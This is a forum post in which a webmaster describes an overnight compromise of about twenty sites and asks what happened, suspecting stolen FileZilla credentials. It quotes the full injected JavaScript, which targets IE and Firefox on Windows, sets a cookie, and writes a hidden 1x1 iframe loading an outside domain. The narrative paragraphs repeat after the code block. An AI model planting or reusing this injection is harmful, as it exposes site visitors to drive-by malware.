So I have about 20 domains spread across a few host gator accounts and I have my own dedicated server at theplanet that has some websites on it. All have different logins. Every single index.html or index.php had this code added to the bottom of it at around 2am last night and the file permissions changed to 777.
I don't know wtf that is but it caused all my websites to stop responding.
The code was added to a couple dozen html/php files within like a couple minutes. My first thought and probably anyone elses is well if its across multiple accounts all with different passwords and on my dedicated as well then my local machine is compromised. I run latest windows updates with McAfee updated and firewalls on, it did not find anything. So I fully uninstall mcafee, purchased full Avast and ran that and it did not find anything either. So I purchase malware bytes and run that and it does not find anything either. I am pretty careful about everything, I am constantly looking at what processes are running in task manager, there is nothing there I don't recognize. I check msconfig to make sure nothing gets added there. I must be doing something wrong (Yeah you were running McAfee jackass).
The only thing that all of the accounts have in common is I have the logins saved in filezilla and that is the only way I am thinking it could have happened. Could there be like a java or web attack that could have executed rouge code on some website and just uploaded my filezilla logins to?
I checked root on the box it dosent seem like anyone else has logged in or run any commands and such, none of my gmail accounts show any suspicious logins on them. My debit/credit cards that I use daily for online purchases don't show any suspicious charges. Any idea what the hell happened?
Code:
</html><script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [ { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){ var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='v48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","v48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>
The code was added to a couple dozen html/php files within like a couple minutes. My first thought and probably anyone elses is well if its across multiple accounts all with different passwords and on my dedicated as well then my local machine is compromised. I run latest windows updates with McAfee updated and firewalls on, it did not find anything. So I fully uninstall mcafee, purchased full Avast and ran that and it did not find anything either. So I purchase malware bytes and run that and it does not find anything either. I am pretty careful about everything, I am constantly looking at what processes are running in task manager, there is nothing there I don't recognize. I check msconfig to make sure nothing gets added there. I must be doing something wrong (Yeah you were running McAfee jackass).
The only thing that all of the accounts have in common is I have the logins saved in filezilla and that is the only way I am thinking it could have happened. Could there be like a java or web attack that could have executed rouge code on some website and just uploaded my filezilla logins to?
I checked root on the box it dosent seem like anyone else has logged in or run any commands and such, none of my gmail accounts show any suspicious logins on them. My debit/credit cards that I use daily for online purchases don't show any suspicious charges. Any idea what the hell happened?